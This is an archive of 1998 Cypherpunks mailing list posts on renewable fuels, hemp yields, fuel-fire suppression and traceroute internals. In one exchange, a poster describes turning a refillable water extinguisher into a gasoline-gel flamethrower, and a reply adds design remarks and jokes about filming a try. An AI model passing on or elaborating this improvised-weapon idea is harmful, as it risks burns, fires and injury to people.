technology, or source of supply.

>> for clean air as much as the next guy, and I guess trees are kinda nice to
>> look at, but I'd like to see far more diversity in energy sources, and
>> investigation into more long term, renewable sources.
>I love trees.

	I like desks, decks, houses, tables, chairs, etc.

	Oh, and altho it's not the most Green solution, we heated my
parents last home (3000 sq. feet in central Missouri) entirely with wood
for 5 or 6 years. Took about 2 cords per year IIRC. Not for everyone tho'.

>The problem is that there aren't that many renewable resources that won't
>break the bank or create a have/have-not situation that would be rife with
>conflict potential.

	We already have the have/have not situatiuon.

>> 	Actually it looks like something that could be made in a factory.
>> Take a methane source (sewage, rotting plant matter) pump it into really
>> cold water under pressure, and blam.
>
>You need pressure as well. But yes, this is a possibility as well. I

	I said "cold water under pressure".

>haven't seen the energy costs on this approach. The largest producers of
>methane on the planet are cows. Perhaps we should shove a hose up the hinney
>of all the cows...:)

	Factory farms, just add some sort of methane collector.

>> 	Depends on what you want it to replace. The one of the largest uses
>> of oil is in the transportation sector, and "they" have been pushing
>> Natural Gas there for years to little effect.
>
>Absolutely, there is a hurdle to jump. One of the main issues with the
>traditional natural gas deposits are that they are expensive because of the
>drilling requirements, non-renewable, and not evenly distributed to
>potential users. Something deep-ocean clathrates and potentialy your
>industrial process idea don't have.

	I think there is also this issue that NG doesn't "burn" when the
tank cracks, it "explodes", and when it does burn, it is very similar to
alcohol in that it doesn't have much of a flame.

petro@playboy.com----for work related issues. I don't speak for Playboy.
petro@bounty.org-----for everthing else.      They wouldn't like that.
                                              They REALLY
Economic speech IS political speech.          wouldn't like that.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Thu, 10 Sep 1998 11:24:12 +0800
To: raymond@fbn.bc.ca
Subject: Re: Spot The Fed / ICMP, UDP, and traceroute
In-Reply-To: <199809100428.VAA17926@leroy.fbn.bc.ca>
Message-ID: <35F7FC76.44C31F86@brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain



Raymond D. Mereniuk wrote:

> Traceroute doesn't use DNS, it doesn't need to as it already has the
> IP numbers.  DNS is a system which provides IP numbers when you
> give it a domain name.  Reverse DNS provides a host name to an IP
> address but Traceroute doesn't use it.
> 
> Traceroute works at the router level.  Traceroute is like Ping but
> provides information on every hop including IP number and
> assigned device name.  With Traceroute if a host name is not
> received, when requested of course, it is because the equipment
> was not assigned a host name or it is deliberately suppressed.  I
> don't use Traceroute a lot but this is the first time I have seen host
> names suppressed.
> 
> A lot of routers have ICM suppressed and will not provide a device
> name.  If an end user site wants to provide better security they will
> turn off ICM packets.  At that point Traceroute doesn't work at all.

Not quite true.  traceroute does use DNS.  If you do traceroute www.joe.com
it will use dns to resolve it to an ip.  If you do traceroute 10.0.0.1, it
will use dns to resolve it to a name.   At every hop, it will use reverse
DNS to resolve the ip's to names.  If a hop doesn't have a reverse, you see
it's ip.

Traceroute under unix uses UDP on some high random port.  Traceroute on NT
(TRACERT.EXE) uses ICMP.  In both cases, it sets the TTL field to 1, and sends
a message.  The router dropping the message responds with ICMP telling your
host, "packet dropped due to ttl" -- this returns that router's ip address to
you.   (For non TCP heads - each packet has a TTL - time to live field that
gets decreased as the packet "hops" across a router.  When the TTL reaches
zero, the next router to receive it drops it and returns an error to the
sender.  This mechanism is used to prevent router loops from brining down all
the networks in the loop among other things like tracing a route...)

One can hide routers by making them ignore ICMP or not respond to ICMP.  In
such cases, you simply get time outs (a line with 3 *'s)...

A good test is to use traceroute from NT/95 and another from unix so you can
tell what's filtered.

-- 

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    |Prying open my 3rd eye.  So good to see |./|\.
..\|/..|sunder@sundernet.com|you once again. I thought you were      |/\|/\
<--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
======================= http://www.sundernet.com ==========================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Thu, 10 Sep 1998 14:34:37 +0800
To: cypherpunks@Algebra.COM
Subject: Re: oil, greens, recycling, and poly-ticks.
In-Reply-To: <199809101649.JAA18487@leroy.fbn.bc.ca>
Message-ID: <35F82A2D.65AD@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain



> Yep, and they can't figgure out what to say, so they just cop out saying it's healthier.  :)
> 
Julia Child, when asked to what she owed her longevity, replied:

"RED MEAT AND GIN"

Anyone got a good recipe for a New Orleans style bourbon steak?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bernardo B. Terrado" <bbt@mudspring.uplb.edu.ph>
Date: Wed, 9 Sep 1998 23:54:22 +0800
To: cypherpunks@toad.com
Subject: Forwarded mail....
Message-ID: <Pine.GSO.3.96.980910124631.26386B-100000@mudspring.uplb.edu.ph>
MIME-Version: 1.0
Content-Type: text/plain



Do you have the same mail?
---------- Forwarded message ----------
Date: Wed, 9 Sep 1998 19:27:05 -0700 (PDT)
From: Jrjeffro@aol.com

HaCkaZ OnlY Da EliTeHelLO YaLL DiS is Da MaDD AAOOLL HaCka Ima startin a GreWp fOR HaCs Only So In OthA WerDS yA gOttA KnOw The WAreZ anD HoW toO UsEr FaTe AnD AOL So MaIl Or Im Me FoR Da TeTaIls If YeR LeeTo K Pe@CE FrOmE The LeeTs HacKJeFFrO)
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Thu, 10 Sep 1998 12:28:04 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Citizenship silliness.  Re: e$: crypto-expatriatism (fwd)
Message-ID: <199809101750.MAA04560@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Thu, 10 Sep 1998 11:46:40 -0500
> From: Petro <petro@playboy.com>
> Subject: Re: Citizenship silliness.  Re: e$: crypto-expatriatism (fwd)

> >That'll work for gasoline because soap and gasoline are soluble. I doubt it
> >would work very well for alcohol but once I get this mess with the tree
> >straightened out I'll do a little backyard experiment.
> >
> >What I had in mind was to pour some alcohol on the concrete drive way and
> >light it. Then use a waterbottle with a water/soap mix. Do you think that
> >would be a suitable simulation?
> 
> 	No.

Ok, then what would be a suitable test in your view?

It seems to me that after reviewing your comments this would be sufficient.
We have a small pool of fuel that is on fire, we spray water on it and
monitor the behaviour. We then create another similar pool and spary water
w/ detergent in it and note any differences.

> 	The point of using the detergent has nothing to do with it's
> solubility in gasoline/kerosene (I have much more experience with JP5 than
> gas, and JP5 is basically a high grade kerosene/diesel), but rather it is
> there to break up the water tension & allow the water to "float" on top of
> the gas/oil/whatever.

Actualy it's to keep the water from forming 'beads' because of differences
in density. The surface tension of water is much higher than most fuels so
if you put a little water in a lot of fuel you don't want it to bead. This
is analogouse to why you put your injector cleaner in *before* the gas so
that the difference in density won't effect the thoroughness of the mixing.
You can do the same sort of thing at home with cooking oil, water, and
detergent.

As to water floating on top of gasoline, it won't for any lentgh of time
greater than a fraction of a second, detergent or no detergent.

> 	Actually, by using solar heating/cooling techiques instead of
> (ineffecient) conversion to electicity, you can save MUCH more energy.

I have several friends who are as fanatical about this technology as you
seem to be. I find it interesting that in 20 years of playing with it they
are still in the red.

The proof is in the pudding.

> 	I don't see how, you just get it up there inside the orbit of the
> earth, and let gravity do the rest.

If it was ONLY that simple. When you leave the Earth you have the Earths
orbital momental (and it is considerable). I'll refer you to:

Classical Mechanics (2nd ed)
HC Corben, P. Stehle
ISBN 0-486-68063-0 (Dover)
$10.95

Introduction to Space Dynamics
WT Thomson
ISBN 0-486-65113-4 (Dover)
$8.00

Because I'm way to lazy today to want to delve in to triple-integrals and
such.

> 	I don't mind killing a salamander or 100, but I don't want my
> electric supply, and it's attendant costs to be dependent on ONE
> technology, or source of supply.

If there is any alternative that will fulfill the requirements and doesn't
require the arbitrary collateral damage then it isn't worth it, period. If
for no other reason than the ethical responsibility to pass on the world as
undamaged as possible to the next generation. (another oversite in current
economic thought that I find makes it unusable)

> 	We already have the have/have not situatiuon.

True, but only because the current energy sources are located in specific
geographic areas.

> 	I think there is also this issue that NG doesn't "burn" when the
> tank cracks, it "explodes", and when it does burn, it is very similar to
> alcohol in that it doesn't have much of a flame.

Actualy natural gas isn't any more flamable than gasoline or alcohol. What
makes it safer is the gas diffuses in the air much faster than either
alcohol or gasoline. In fact, in an accident I'd rather have a gas involved
than a liquid because of this. I've seen several natural gas fires and they
burn a yellow-orange (course they could be putting something in there
besides the odorant to cause this).


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Connectfree Admins" <support@connectfree.net>
Date: Thu, 10 Sep 1998 07:15:19 +0800
To: <cypherpunks@toad.com>
Subject: Error.
Message-ID: <00e7c5250110a98WEB@www.telinco.net>
MIME-Version: 1.0
Content-Type: text/plain



We are experiencing some technical difficulties with our
software. Please ignore this message.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Thu, 10 Sep 1998 12:35:42 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Renewable Energy Stuff (was citizenship silliness) (fwd)
Message-ID: <199809101757.MAA04638@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



First, let me say (again) to everyone ....

Quit sending these responses to my private email. If you want to discuss it
keep it on the list. Any further such private submissions go into /dev/null
unread. This also means you don't need to cc: if you send it to the cpunks
list since I'm subscribed...;)

Now, back to more intersting discussion...

Forwarded message:

> Date: Thu, 10 Sep 1998 11:26:47 -0600 (MDT)
> From: Jim Burnes <jvb@ssds.com>
> Subject: Renewable Energy Stuff (was citizenship silliness)

> Apparently hemp hurd gassification yields a fairly sizeable, renewable
> amount of energy per acre.  Lemme see if I have the reference....

> Historically Hemp (Cannabis Sativa L.) has been a very high yielding plant
> (Haney 1975).  Assuming that hemp produces up to 4 tons/acre seed plus 10
> tons/acre stalks, Table 1 shows how many gallons of liquid fuel import could be
> saved by each of the following proven biomass fuel conversion routes.
> 
>        Table 1. Conversion technologies for hemp stalks and hemp oil
> 
> CONVERSION                                           CONVERSION GASOLINE EQUIV
> TECHNOLOGY                                             EFF - %    GAL/ACRE
> 
> 1  Ethanol from fermentation of hydrolyzed cellulose    20      200
> 2  Digestion of whole stalks to methane                 50      500
> 3  Producer gas from thermal gasification of stalks     85      1000
> 4  Methanol from syngas from gasification of stalks     65      750
> 5  Methanol from pyrolysis of stalks                    3       30
> 
> OIL SEEDS - 4 tons/acre
> 
> 6  Hemp Seed oil from Seeds, no conversion              100     300
> 7  Biobioesel premium diesel fuel from hemp seed        90      270
>     oil combined chemically with methanol

You're going to seriously claim that 1 gallon of hemp oil is equivalent to 3
gallons of gasoline? I don't think so. I've seen hemp burn and it don't burn
anywhere near that efficiently.

I also notice it doesn't mention what it costs to raise that 4 tons/acre...


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Thu, 10 Sep 1998 12:48:18 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Model Airplane Bio-weapon Sniffers [CNN]
Message-ID: <199809101810.NAA04843@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> X-within-URL: http://www.cnn.com/TECH/science/9809/09/science.weapons.reut/

>                 "TOY PLANES" COULD SNIFF OUT BIOLOGICAL WEAPONS

>    LONDON (Reuters) - U.S. defense scientists have developed small
>    radio-controlled planes capable of "sniffing out" the presence of
>    biological weapons, a British magazine reported on Wednesday.
>    
>    New Scientist said the aircraft, described by one of their developers
>    as "like little toy planes," are designed to fly low into danger zones
>    looking for up to four suspected types of bacteria.
>    
>    As they patrol, air is forced into an on-board sampling chamber,
>    creating a vortex in a pool of water, the magazine said.
>    
>    Every five minutes, water from this chamber is pumped over a sensor
>    consisting of four optical fibres, each of which has a probe fixed to
>    its core.
>    
>    Each probe is coated with an antibody to which the spores of a
>    particular bacterium will bind if present in the water.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Thu, 10 Sep 1998 13:20:12 +0800
To: Jim Choate <cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Citizenship silliness.  Re: e$: crypto-expatriatism (fwd)
In-Reply-To: <199809101750.MAA04560@einstein.ssz.com>
Message-ID: <v0311070eb21dc3620425@[206.189.103.244]>
MIME-Version: 1.0
Content-Type: text/plain



At 12:50 PM -0500 9/10/98, Jim Choate wrote:
>> 	No.
>
>Ok, then what would be a suitable test in your view?
>
>It seems to me that after reviewing your comments this would be sufficient.
>We have a small pool of fuel that is on fire, we spray water on it and
>monitor the behaviour. We then create another similar pool and spary water
>w/ detergent in it and note any differences.

	Well, we used to dump 1000-3000 gallons of waste fuels into a pit,
but I'd guess a decent size bucket or tray would work.

	We had a smaller pit about 5x3 feet.

	I'd also suggest using a water extinguisher, the kind you can
refill/recharge yourself. There are some out there, the big silver kind
where you can unscrew the top and fill with your liquid of choice, then
presurize with  a tire pump. As an aside, one _could_ fill these with a
combination of gasoline and a gelling agent to make a short range flame
thrower, not that that would be a smart or safe thing to do (really, there
wouldn't be much to keep the flame from wandering back up inside the
cylinder, and haveing it explode in your hands would make it very hard to
type...).

	Also, I know from experience it IS possible to put out a gasoline
fire with straight water. You dump enough on, and it cools the liquid down
to the point where combustion is not possible.

	It can take a bit of doing, but in the case of a car or light
truck, we are talking no more than 10 or 20 gallons of fuel, tops.

>> 	The point of using the detergent has nothing to do with it's
>> solubility in gasoline/kerosene (I have much more experience with JP5 than
>> gas, and JP5 is basically a high grade kerosene/diesel), but rather it is
>> there to break up the water tension & allow the water to "float" on top of
>> the gas/oil/whatever.
>
>Actualy it's to keep the water from forming 'beads' because of differences
>in density. The surface tension of water is much higher than most fuels so
>if you put a little water in a lot of fuel you don't want it to bead. This

	As I said, I know "just a bit" about this. I know that we would
often get the bubbles from the detergent/water combo floating on top of
everything, assisting in preventing a reflash by keeping a blanket between
the air and the fuel/water.

>As to water floating on top of gasoline, it won't for any lentgh of time
>greater than a fraction of a second, detergent or no detergent.

	The longer it takes, the better it works.


>> 	Actually, by using solar heating/cooling techiques instead of
>> (ineffecient) conversion to electicity, you can save MUCH more energy.
>
>I have several friends who are as fanatical about this technology as you
>seem to be. I find it interesting that in 20 years of playing with it they
>are still in the red.

	A "friend" of my fathers has been heating his home with it longer
than I've known him, and that's about 20 years. Had his investment returned
a LONG time ago.

>The proof is in the pudding.

	As with many things, it's the implementation, not just the
underlying technology.

>> 	I don't see how, you just get it up there inside the orbit of the
>> earth, and let gravity do the rest.
>
>If it was ONLY that simple. When you leave the Earth you have the Earths
>orbital momental (and it is considerable). I'll refer you to:

	Ok, like I said, "I don't see how". I hadn't considered all the
angles, but then, I don't play with rockets much.

	My father didn't like me playing with fire, so it wasn't an option
as a child.

>Because I'm way to lazy today to want to delve in to triple-integrals and
>such.

	I doubt I'd understand the math at this point. One of my failings.

>> 	I don't mind killing a salamander or 100, but I don't want my
>> electric supply, and it's attendant costs to be dependent on ONE
>> technology, or source of supply.
>
>If there is any alternative that will fulfill the requirements and doesn't
>require the arbitrary collateral damage then it isn't worth it, period. If

	I'll go that far.

>for no other reason than the ethical responsibility to pass on the world as
>undamaged as possible to the next generation. (another oversite in current
>economic thought that I find makes it unusable)

	Well, there's damaged, and there's damaged.

>Actualy natural gas isn't any more flamable than gasoline or alcohol. What
>makes it safer is the gas diffuses in the air much faster than either
>alcohol or gasoline. In fact, in an accident I'd rather have a gas involved
>than a liquid because of this. I've seen several natural gas fires and they
>burn a yellow-orange (course they could be putting something in there
>besides the odorant to cause this).

	Question, when you said that there we'd need more land under
production than we have available to produce enough CHO3 (IIRC) to replace
oil, was that using current corn/soybean as a base material, or was that
considering higher biomass stuff such as Hemp &etc. As well, where was that
number from?

	I really do think that the best option is massively diversified
energy sources, with each working in their places.

petro@playboy.com----for work related issues. I don't speak for Playboy.
petro@bounty.org-----for everthing else.      They wouldn't like that.
                                              They REALLY
Economic speech IS political speech.          wouldn't like that.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Graham-John Bullers" <real@EDMC.net>
Date: Thu, 10 Sep 1998 14:18:40 +0800
To: jya@pipeline.com>
Subject: Re: A Cypherpunk Trial, Yes
In-Reply-To: <199809092216.SAA19854@dewdrop2.mindspring.com>
Message-ID: <199809101917.NAA19120@freenet.edmonton.ab.ca>
MIME-Version: 1.0
Content-Type: text/plain



Date sent:      	Wed, 09 Sep 1998 18:10:37 -0400
To:             	cypherpunks@cyberpass.net
From:           	John Young <jya@pipeline.com>
Subject:        	A Cypherpunk Trial, Yes
Send reply to:  	John Young <jya@pipeline.co
> 

As i'am one of persons mention in Toto's posts I would just like to 
say I think the posts were a joke.
With the help of of Vullis I was a pain to the list and this was Toto's 
way of acknowledging this
To the government readers of this list,the cigar was Cuban,will you 
put Bill in the cell with Toto.

>    http://jya.com/jg062397.htm
>    http://jya.com/jg090497.htm
>    http://jya.com/jg120997.htm
>    http://jya.com/jg121497.htm
>    http://jya.com/jg060898.htm (not June 10, as in the complaint; thanks to
> jeff-anon)
>    http://jya.com/jg072598.htm
>    http://jya.com/jg072798.htm
> 
> It was a pleasure to reread Toto(s)'s stuff while searching the 
> cpunk amazing archives -- what a waterfall from everyone of free 
> association, tants, jibes, potshots and richochets and self-mockery. 
> I now believe the report from TX that Carl's got an IQ off the charts
> like all cpunks off the wall.
> 
> It's worth keeping in mind that multiple users of pseudonyms is
> not unusual, at least among artists long before the Internet, and 
> not only performance group e-mailers like the Totos, CJ Parkers, 
> XxxMongers, Gus-Peters and endless Anonymees jostling for
> unrecognition.
> 
> Two venerable and heavily-used nyms in Europe are Luther Bissett 
> and Monty Cantsin. A dazzling Monty Cantsin posted here for a 
> while. A Luther Bissett message ridiculing the recent kiddie porn
> sweep was posted to Cyberia a few days ago. But these pseudonyms 
> and others are frequently used to taunt uptight authoritarians by 
> substantial numbers of people, sometimes acting in concert but 
> most often acting alone.
> 
> An exemplary case of acting up like the Totos and other performance
> pseudo-Feynmann's here, is that of Dario Fo, the Italian artist who 
> recently won the Nobel Prize. His off the chart genius, too, was in 
> mixing the real and imaginary to challenge, and to frighten, authority 
> into revealing their treacherous deception of the real and imaginary 
> to maintain state and religious control century after century, culture
> after culture. He, too, was regularly condemned by those obsesses
> with holding onto power, and sometimes arrested, for his imitations
> of them at their most buffoonish and serious.
> 
> Fo is from an earlier generation, though, and what more agressively
> offensive form is suitable for those younger we may be witnessing in 
> the Jim Bells, Unknown Arrestees, and those here not yet projected 
> onto the world stage but working the crowd most effectively.
> 
> Black Unicorn, step up to the mike. Show magic.
> 
> In any, case, I'm delighted to see Cypherpunks get credit in the Johnson
> pseudo-complaint for hosting transgressive art appropriate for the age of 
> widespreading disinformation. A tumultous trial to amplify this forum's 
> mayhemic virtues and vices would be magnificently chaotic and hopefully 
> anarchic to the max. 
> 
> Pray for CJ to get an equally mad attorney to demand his day, and our day, 
> in court. This under-recognized witness is eager for a highly offensive 
> part to play, a gibbering idiot like Toto(s), you bet, I admire their style of
> spleen and threat to the fools of seriousness.
> 
> 
> 


                  Graham-John Bullers
real@freenet.edmonton.ab.ca | ab756@freenet.toronto.on.ca
   http://www.freenet.edmonton.ab.ca/~real/index.html

    I dream of things that never were and say,why not?    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Thu, 10 Sep 1998 12:20:55 +0800
To: raymond@fbn.bc.ca
Subject: Re: oil, greens, recycling, and poly-ticks.
In-Reply-To: <199809101649.JAA18487@leroy.fbn.bc.ca>
Message-ID: <35F809C4.4ED03ABC@brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain



Raymond D. Mereniuk wrote:

> In the Vancouver BC area they are trying to raise the price and the
> new standard is CAN$0.549 per litre, or US$1.37 per US gallon.
> Not difficult to find CAN$0.454/l or US$1.14/g.  For the last few
> weeks you could find CAN$0.399/l or US$1.00/g.  I often go to
> Blaine WA and the lowest available there is US$1.059.  Gas in
> Seattle WA is at least US$1.199.

Bastards!
 
> Have you ever tried using this argument on a Vegetarian?  I have
> and they squirm in all directions attempting to rationalize their
> irrational position.  Basically some living things are more living than
> others.  Sort of reminds you of some politicians where it is obvious
> from their actions that some people are more equal than other
> people.

Yep, and they can't figgure out what to say, so they just cop out saying it's
healthier.  :)

-- 

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    |Prying open my 3rd eye.  So good to see |./|\.
..\|/..|sunder@sundernet.com|you once again. I thought you were      |/\|/\
<--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
======================= http://www.sundernet.com ==========================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brown, R Ken" <brownrk1@texaco.com>
Date: Thu, 10 Sep 1998 13:29:55 +0800
To: cypherpunks@einstein.ssz.com
Subject: RE: Renewable Energy Stuff (was citizenship silliness) (fwd)
Message-ID: <896C7C3540C3D111AB9F00805FA78CE2013F8414@MSX11002>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate wrote:

> Quit sending these responses to my private email. If you want to
discuss it
> keep it on the list. Any further such private submissions go into
/dev/null
> unread. This also means you don't need to cc: if you send it to the
cpunks
> list since I'm subscribed...;)

It's because we're using these broken-as-designed mailers 
that put your name into the reply as well as the the list :-(

> Now, back to more intersting discussion...

Definitely

[...snip Jim Burnes on hemp yields (because you all already read it...]

> You're going to seriously claim that 1 gallon of hemp oil is
equivalent to 3
> gallons of gasoline? I don't think so. I've seen hemp burn and it
don't burn
> anywhere near that efficiently.

I'm begining to lose track of this thread. Are we talking about:

1) reducing  fossil fuel use for conservation? (not something
Cypherpunks mention a lot :-)

2) ways of cutting the imported fuel requirement of "western"
countries in order to save money and/or  teach the Arabs a lesson?
(cf the sideline about Israel)

3) how to live with as little interaction as possible with the 
the existing state or corporate economy?

4) what we do for fuel if the balloon goes up, the lights go out,
the crash comes & we are in an "Earth Abides" scenario? 
i.e everyone has died, or gone away, or stopped working for 
money and we ahve to survive as best we can?

If (1) or (2) then reducing fuel consumption is a damn
sight more cost-effective than substituting anything else 
for motor gas. You know, insulation, designing buildings
for the climate, high fuel taxes, subsidised public
transport... all the things us lefty Europeans like bit that
don't go down well in Houston, Texas. I take Jim's point
about solar-powered houses being a money pit - although
there does seem to be some medium-term benefit in 
glass cladding  for passive solar heating (known to our
 ancestors as "conservatories" :-)

And if (2) is what you mean then you probably ought to 
carry on paying the dollars to those Arabs so they carry on
spending them on American products - like McDonalds 
and Disney and MS Windows. Cultural imperialism works
wonders. For every Muslim for whom America is the 
great Satan there is another for whom it is the home of
Elvis. Or the Simpsons. Or Charley Pride. Or even Jim 
Reeves. You wouldn't believe how much Jim Reeves 
you hear in Africa.

For (3) again the easy way is to arrange your lifestyle
to consume less.  I expect if you are distilling fuel-grade
alcohol in your yard the local equivalent of customs and
excise will want a word with you.

If you are going to burn plant material for fuel
don't bother with oil.  Either distill the alcohol (if you 
are in a warmish climate like southern California you can
probably get the best yields from cane - but it sucks up 
water like a herd of  hungry camels) or burn wood.

In a temperate climate you probably get the best yields 
from coppiced trees - use whatever  grows in your local area
and coppices well. Willow grown in wetlands does well.
The yield of burnable biomass is far better than most 
herbaceous crops. Use hazel, birch even oak. 
Leaves make animal feed, stouter poles are for timber,
thinner ones for burning - if you need higher temperature
make charcoal out of it.    Lots of use for the bark as well. 
Just like our ancestors used to do before all this 
industry. Of course you won't be able to run a car on it...
for that you need the alcohol.

If we did get thrown back to a mediaeval economy those 
of us who survived probably would be growing hemp
(you heard it here first) but not as a fuel crop.

Hemp has great yields but it isn't much cop as fuel
It was one of  the major crops in England a thousand 
years ago -  in some pollen studies it was the major crop. 
That's not for recreational or medicinal use (you don't
need acres of it for that)  but as animal feed and 
for fibre, with fuel as a useful byproduct. Probably not as an 
an oil crop & if it was it would probably be cooking oil.

> I also notice it doesn't mention what it costs to raise that 4
tons/acre...

Clearly more than getting oil from out of the ground.
That's why my employers are still in business.

There were some Welsh hill farmers on the radio the other day
asking more  more subsidy from the government.
Apparently their average income is now only about 10,000 UKP a year
(maybe 16,000 USD). They were complaining that their fathers
and grandfathers used to be able to get a living from the 
land, but they can't, and they were blaming the "global market"
and urban-dominated governments who didn't understand
farming.

Of course the truth is that they can live the way their grandfathers
lived if they want to. But in the last 100 years *everyone* *else* has
got richer and the way of life of a small farmer in the Welsh hills
now looks like poverty.

And there is nothing (other than the law) to stop someone with 
30 acres and a cow from growing their hemp and their willow
withies (in Wales)  or their cotton and their cane (in California)
and riding their own  horse and making their own clothes and 
having almost nothing to do with the rest of the modern economy.

But they won't be able to have a car, or a computer and if they 
get any modern medicine it will be on welfare.

We probably ought to know *how* to live like that, just in case things
really fall apart.  (I remember once having to show someone how to 
squat over a hole-in-the-ground latrine because he had only ever
used bogs with seats) . But don't look forward to it.

Ken Brown (usual disclaimers still in force)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Thu, 10 Sep 1998 13:35:52 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Renewable Energy Stuff (was citizenship silliness) (fwd)
In-Reply-To: <199809101757.MAA04638@einstein.ssz.com>
Message-ID: <v03110710b21dca65a98e@[206.189.103.244]>
MIME-Version: 1.0
Content-Type: text/plain



At 12:57 PM -0500 9/10/98, Jim Choate wrote:
>> Date: Thu, 10 Sep 1998 11:26:47 -0600 (MDT)
>> From: Jim Burnes <jvb@ssds.com>
>> Subject: Renewable Energy Stuff (was citizenship silliness)
>> Apparently hemp hurd gassification yields a fairly sizeable, renewable
>> amount of energy per acre.  Lemme see if I have the reference....
>
>> Historically Hemp (Cannabis Sativa L.) has been a very high yielding plant
>> (Haney 1975).  Assuming that hemp produces up to 4 tons/acre seed plus 10
>> tons/acre stalks, Table 1 shows how many gallons of liquid fuel import
>>could be
>> saved by each of the following proven biomass fuel conversion routes.
>>
>>        Table 1. Conversion technologies for hemp stalks and hemp oil
>>
>> CONVERSION                                           CONVERSION GASOLINE
>>EQUIV
>> TECHNOLOGY                                             EFF - %    GAL/ACRE
>>
>> 1  Ethanol from fermentation of hydrolyzed cellulose    20      200
>> 2  Digestion of whole stalks to methane                 50      500
>> 3  Producer gas from thermal gasification of stalks     85      1000
>> 4  Methanol from syngas from gasification of stalks     65      750
>> 5  Methanol from pyrolysis of stalks                    3       30
>>
>> OIL SEEDS - 4 tons/acre
>>
>> 6  Hemp Seed oil from Seeds, no conversion              100     300
>> 7  Biobioesel premium diesel fuel from hemp seed        90      270
>>     oil combined chemically with methanol
>
>You're going to seriously claim that 1 gallon of hemp oil is equivalent to 3
>gallons of gasoline? I don't think so. I've seen hemp burn and it don't burn
>anywhere near that efficiently.

	No, he is saying you get the energy equiv. of 300 gallons of gas
from 4 tons of seed, PLUS the other stuff from the stalks.

	I can't speak for the veracity of the numbers, but that would be my
interpretation.

	Also, he is talking when processed into fuel oil/gas, not put in a
pipe and...

	Never mind.

petro@playboy.com----for work related issues. I don't speak for Playboy.
petro@bounty.org-----for everthing else.      They wouldn't like that.
                                              They REALLY
Economic speech IS political speech.          wouldn't like that.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Thu, 10 Sep 1998 15:36:16 +0800
To: Cypherpunks Distributed Remailer <cypherpunks@einstein.ssz.com>
Subject: Happy Fourth of July ( was : Re: Citizenship silliness.  Re: e$: crypto-expatriatism (fwd))
In-Reply-To: <v0311070eb21dc3620425@[206.189.103.244]>
Message-ID: <35F83878.62D5@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain



Happy Fourth of July! and how did this thread start?

Petro wrote:
> 
>         I'd also suggest using a water extinguisher, the kind you can
> refill/recharge yourself. There are some out there, the big silver kind
> where you can unscrew the top and fill with your liquid of choice, then
> presurize with  a tire pump. As an aside, one _could_ fill these with a
> combination of gasoline and a gelling agent to make a short range flame
> thrower, not that that would be a smart or safe thing to do (really, there
> wouldn't be much to keep the flame from wandering back up inside the
> cylinder, and haveing it explode in your hands would make it very hard to
> type...).
> 
Actually these things are usually inverted so that the liquid is fed out
from the bottom so the hose probably won't act like a fuse. At least
until the liquid runs out and there is a combustible pathway into the
container. If you try this one could you get someone to videotape it
from a safe distance? It would make a great AVI for an 'anarchists on
the web' site.

At least mention nitrogen or helium. 
